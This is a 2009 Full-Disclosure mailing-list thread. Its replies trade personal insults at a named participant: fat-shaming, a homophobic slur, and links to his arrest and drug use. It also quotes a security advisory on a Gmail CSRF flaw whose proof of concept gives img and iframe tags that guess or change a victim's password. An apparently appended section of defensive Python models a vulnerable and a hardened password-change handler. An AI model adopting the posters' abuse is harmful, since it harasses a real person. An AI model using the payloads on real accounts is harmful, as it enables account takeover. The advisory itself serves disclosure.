Date: Wed, 04 Mar 2009 20:06:39 -0500
From: bobby.mugabe@...hmail.com
To: security.mustache@...il.com
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Apple Safari ... DoS Vulnerability


'stache,

Perhaps his current lack of methamphetamines is the cause of his
extra girth.

Mr. Starks, I suggest immediately going off the low-reward, mass-
marketed and overpriced muscle milk and doing a bit of
cardiovascular exercise until you've lost some of that fat, fatass.

- -bm

On Wed, 04 Mar 2009 19:59:41 -0500 Valdis' Mustache
<security.mustache@...il.com> wrote:
>Rob,
>
>Our young scholar does nonetheless have some sage advice for young
>ladies of colour.
>
>http://www.helium.com/items/250130-advice-to-black-females
>
>I was rather alarmed at his arrest and methamphetamine abuse, however one
>might presume that his recent weight training is part of a rehabilitation
>regimen.
>
>http://www.coloradoan.com/article/20090117/NEWS01/901170316/1002/
>
>
>Your humble servant,
>Усы из Валдис
>
>
>On Wed, Mar 4, 2009 at 6:44 PM,  <bobby.mugabe@...hmail.com>
>wrote:
>>
>> Mr. Stark,
>>
>> Your body fat seems to be fairly high; you should consider a
>> cutting phase and quitting the muscle milk and whatever cheap
>> steroids you use.  You're looking like a fat dumb homosexual in those
>> tights.  Someone with your levels of insecurity shouldn't be in
>> computer security.
>>
>> - -bm
>>
>> On Wed, 04 Mar 2009 16:44:50 -0500 Jason Starks
>> <jstarks440@...il.com> wrote:
>>>Ah, probably not. Your stringing together words to make sentences
>>>is what I'll regret reading. I'll continue to use my muscle milk and
>>>you'll continue to work your 9-5. The world turns once again!
>>>
>>>On Wed, Mar 4, 2009 at 4:06 PM, Valdis' Mustache <
>>>security.mustache@...il.com> wrote:
>>>
>>>> Mister Snarks,
>>>>
>>>> I've never been anything but who I purport to be, the humble upper
>>>> facial hair quadrant of a loquacious sysadmin. Low of birth, though
>>>> noble in aspiration, a student of history and of the many mustaches
>>>> who came before myself.
>>>>
>>>> You, young scholar, should be wary, though! Prospective employers do
>>>> make regular use of search engines, "googling" potential candidates to
>>>> gain insight into possible character flaws!
>>>>
>>>> True, your clean and jerk abilities as archived on the YouTube are
>>>> admirable, but acting a fool on security lists is something normally
>>>> reserved only for those in academia, who are markedly difficult if not
>>>> impossible to unseat from their comfortable chairs, as indisputably
>>>> underscored by the e-antics of this mustache's owner, and, of course,
>>>> Mssr. Schmehl.
>>>>
>>>> You'll come to regret your lack of anonymity, as your posts will live
>>>> on for eternity, much as I've come to regret my unfortunate
>>>> association with the unruly beardlike growth connecting to me from the
>>>> south, and my unavoidable tenuous connection with those objectionable
>>>> and uncouth sideburns.
>>>>
>>>>
>>>> Your humble servant,
>>>> I baffi di Valdis
>>>>
>>>> On Wed, Mar 4, 2009 at 12:55 PM, Jason Starks <jstarks440@...il.com>
>>>> wrote:
>>>> > I know, it's insane. It is a new trend, though, just like people
>>>> > registering gmail accounts just to flame and troll on FD!
>>>> >
>>>> > It's like, your credibility like, goes like, ok you start like at 0, and
>>>> > then like, it goes like to -1, and like, then even lower like.
>>>> >
>>>> > Absolutely genius.
>>>> >
>>>> > x0x0x0x0x0x0x0x0x0x
>>>> >
>>>> > On Tue, Mar 3, 2009 at 6:28 PM, Biz Marqee <biz.marqee@...il.com> wrote:
>>>> >>
>>>> >> This was 2 years well spent... NOT!
>>>> >>
>>>> >> Seriously what is with all these people popping up releasing advisories
>>>> >> that are absolute SHIT? Is it to try and get jobs or what?
>>>> >>
>>>> >>
>>>> >> On Tue, Mar 3, 2009 at :55 AM, ISecAuditors Security Advisories <
>>>> >> advisories at isecauditors.com> wrote:
>>>> >>
>>>> >> > =============================================
>>>> >> > INTERNET SECURITY AUDITORS ALERT 2007-003
>>>> >> > - Original release date: August 1st, 2007
>>>> >> > - Last revised: January 11th, 2009
>>>> >> > - Discovered by: Vicente Aguilera Diaz
>>>> >> > - Severity: 3/5
>>>> >> > =============================================
>>>> >> >
>>>> >> > I. VULNERABILITY
>>>> >> > -------------------------
>>>> >> > CSRF vulnerability in GMail service
>>>> >> >
>>>> >> > II. BACKGROUND
>>>> >> > -------------------------
>>>> >> > Gmail is Google's free webmail service. It comes with built-in Google
>>>> >> > search technology and over 2,600 megabytes of storage (and growing
>>>> >> > every day). You can keep all your important messages, files and
>>>> >> > pictures forever, use search to quickly and easily find anything
>>>> >> > you're looking for, and make sense of it all with a new way of viewing
>>>> >> > messages as part of conversations.
>>>> >> >
>>>> >> > III. DESCRIPTION
>>>> >> > -------------------------
>>>> >> > Cross-Site Request Forgery, also known as one click attack or session
>>>> >> > riding and abbreviated as CSRF (Sea-Surf) or XSRF, is a kind of
>>>> >> > malicious exploit of websites. Although this type of attack has
>>>> >> > similarities to cross-site scripting (XSS), cross-site scripting
>>>> >> > requires the attacker to inject unauthorized code into a website,
>>>> >> > while cross-site request forgery merely transmits unauthorized
>>>> >> > commands from a user the website trusts.
>>>> >> >
>>>> >> > GMail is vulnerable to CSRF attacks in the "Change Password"
>>>> >> > functionality. The only token to authenticate the user is a session
>>>> >> > cookie, and this cookie is sent automatically by the browser in every
>>>> >> > request.
>>>> >> >
>>>> >> > An attacker can create a page that includes requests to the "Change
>>>> >> > password" functionality of GMail and modify the passwords of the users
>>>> >> > who, being authenticated, visit the page of the attacker.
>>>> >> >
>>>> >> > The attack is facilitated since the "Change Password" request can be
>>>> >> > made with the HTTP GET method instead of the POST method that the
>>>> >> > "Change Password" form habitually uses.
>>>> >> >
>>>> >> > IV. PROOF OF CONCEPT
>>>> >> > -------------------------
>>>> >> > 1. An attacker creates a web page "csrf-attack.html" that makes many
>>>> >> > HTTP GET requests to the "Change Password" functionality.
>>>> >> >
>>>> >> > For example, a password cracking of 3 attempts (see "OldPasswd"
>>>> >> > parameter):
>>>> >> > ...
>>>> >> > <img src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
>>>> >> > <img src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD2&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
>>>> >> > <img src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD3&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
>>>> >> > ...
>>>> >> >
>>>> >> > or with hidden frames:
>>>> >> > ...
>>>> >> > <iframe src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
>>>> >> > <iframe src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
>>>> >> > <iframe src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
>>>> >> > ...
>>>> >> >
>>>> >> > The attacker can deliberately use a weak new password (see "Passwd"
>>>> >> > and "PasswdAgain" parameters); this way he can know if the analysed
>>>> >> > password is correct without needing to modify the password of the
>>>> >> > victim user.
>>>> >> >
>>>> >> > Using weak passwords the "Change Password" response is:
>>>> >> >  - " The password you gave is incorrect. ", if the analysed password
>>>> >> > is not correct.
>>>> >> >  - " We're sorry, but you've selected an insecure password. In order
>>>> >> > to protect the security of your account, please click "Password
>>>> >> > Strength" to get tips on choosing to safer password. ", if the
>>>> >> > analysed password is correct and the victim password is not modified.
>>>> >> >
>>>> >> > If the attacker wants to modify the password of the victim user, the
>>>> >> > expected response message is: " Your new password has been saved - OK ".
>>>> >> >
>>>> >> > In any case, the attacker evades the restrictions imposed by the
>>>> >> > captcha of the authentication form.
>>>> >> >
>>>> >> > 2. A user authenticated in GMail visits the "csrf-attack.html" page
>>>> >> > controlled by the attacker.
>>>> >> >
>>>> >> > For example, the attacker sends a mail to the victim (a GMail account)
>>>> >> > and gets the victim to visit his page (social engineering). So, the
>>>> >> > attacker ensures that the victim is authenticated.
>>>> >> >
>>>> >> > 3. The password cracking is executed transparently to the victim.
>>>> >> >
>>>> >> > V. BUSINESS IMPACT
>>>> >> > -------------------------
>>>> >> > - Selective DoS on users of the GMail service (changing user password).
>>>> >> > - Possible access to the mail of other GMail users.
>>>> >> >
>>>> >> > VI. SYSTEMS AFFECTED
>>>> >> > -------------------------
>>>> >> > Gmail service.
>>>> >> >
>>>> >> > VII. SOLUTION
>>>> >> > -------------------------
>>>> >> > No solution provided by vendor.
>>>> >> >
>>>> >> > VIII. REFERENCES
>>>> >> > -------------------------
>>>> >> > http://www.gmail.com
>>>> >> >
>>>> >> > IX. CREDITS
>>>> >> > -------------------------
>>>> >> > This vulnerability has been discovered and reported by
>>>> >> > Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).
>>>> >> >
>>>> >> > X. REVISION HISTORY
>>>> >> > -------------------------
>>>> >> > July      31, 2007: Initial release
>>>> >> > August     1, 2007: A few corrections.
>>>> >> > December  30, 2008: Last details.
>>>> >> >
>>>> >> > XI. DISCLOSURE TIMELINE
>>>> >> > -------------------------
>>>> >> > July      30, 2007: Vulnerability acquired by
>>>> >> >                    Internet Security Auditors.
>>>> >> > August     1, 2007: Initial notification sent to the
>>>> >> >                    Google security team.
>>>> >> > August     1, 2007: Google security team requests additional
>>>> >> >                    information about and starts reviewing the
>>>> >> >                    vulnerability.
>>>> >> > August    13, 2007: Request information about the status.
>>>> >> > August    15, 2007: Google security team responds that they are still
>>>> >> >                    working on this.
>>>> >> > September 19, 2007: Request for the status. No response.
>>>> >> > November  26, 2007: Request for the status. No response.
>>>> >> > January    2, 2008: Request for the status. No response.
>>>> >> > January    4, 2008: Request for the status. No response.
>>>> >> > January   11, 2008: Request for the status. No response.
>>>> >> > January   15, 2008: Request for the status. Automated response.
>>>> >> > January   18, 2008: Google security team informs that they don't expect
>>>> >> >                    behaviour to change in the short term, giving
>>>> >> >                    the justification.
>>>> >> >                    We deconstruct those arguments as insufficient.
>>>> >> >                    No more responses.
>>>> >> > December  30, 2008: Request for the status. Confirmation from Google
>>>> >> >                    they won't change the consideration about this.
>>>> >> > January   11, 2009: Publication to Bugtraq. Rejected twice.
>>>> >> >                    No reasons.
>>>> >> > March     03, 2009: General publication for disclosure in other lists.
>>>> >> >
>>>> >> > XII. LEGAL NOTICES
>>>> >> > -------------------------
>>>> >> > The information contained within this advisory is supplied "as-is"
>>>> >> > with no warranties or guarantees of fitness of use or otherwise.
>>>> >> > Internet Security Auditors accepts no responsibility for any damage
>>>> >> > caused by the use or misuse of this information.
>>>> >> >
>>>> >> > _______________________________________________
>>>> >> > Full-Disclosure - We believe in it.
>>>> >> > Charter: http://lists.grok.org.uk/full-disclosure-
>>>charter.html
>>>> >> > Hosted and sponsored by Secunia - http://secunia.com/
>>>> >> >
>>>> >>
>>>> >
>>>> >
>>>> >
>>>>
>>
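The advisory quoted in this thread describes a password-change endpoint that accepts GET requests authenticated only by the session cookie and answers with distinct messages for a wrong old password, a correct old password with a weak new one, and a successful change. The Python below is an added illustration, not code from the advisory or from Google: it models that handler next to a hardened version that insists on POST and a per-session anti-CSRF token, so a cross-site `<img>` or `<iframe>` request is refused before any password is checked. The in-memory session store, the cookie format and the 8-character weak-password rule are assumptions.

```python
import secrets
from urllib.parse import parse_qs, urlsplit

# Constructed in-memory session store: cookie value -> account state (assumption).
SESSIONS = {}


def new_session(user, password):
    """Sign a user in; returns the cookie the browser will attach to every request."""
    cookie = "SID=" + secrets.token_hex(8)
    SESSIONS[cookie] = {"user": user, "password": password, "csrf": secrets.token_hex(16)}
    return cookie


def _apply_change(sess, params):
    # Shared password-change logic; the three messages are the ones the advisory quotes.
    old, new, again = (params.get(k, "") for k in ("OldPasswd", "Passwd", "PasswdAgain"))
    if old != sess["password"]:
        return 200, "The password you gave is incorrect."
    if new != again or len(new) < 8:
        # A deliberately weak new password lands here: the caller learns that
        # OldPasswd was right, yet the stored password is left untouched.
        return 200, "We're sorry, but you've selected an insecure password."
    sess["password"] = new
    return 200, "Your new password has been saved - OK"


def vulnerable_update_passwd(method, cookie, url):
    """Modelled on the advisory: any HTTP method, the session cookie is the only
    check, and every parameter is taken from the URL query string."""
    sess = SESSIONS.get(cookie)
    if sess is None:
        return 403, "not signed in"
    params = {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}
    return _apply_change(sess, params)


def hardened_update_passwd(method, cookie, form):
    """Same operation with CSRF defences: POST only, parameters from the request
    body, and a per-session token that a cross-site page cannot read or supply."""
    sess = SESSIONS.get(cookie)
    if sess is None:
        return 403, "not signed in"
    if method != "POST":
        return 405, "state-changing request must use POST"
    if not secrets.compare_digest(form.get("csrf_token", ""), sess["csrf"]):
        return 403, "missing or invalid CSRF token"
    return _apply_change(sess, form)
```

Feeding the advisory's own `UpdatePasswd` URL into `vulnerable_update_passwd` reproduces the oracle it describes; the same cookie gets nothing but 405/403 from `hardened_update_passwd` until the request is a POST carrying the session's token.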
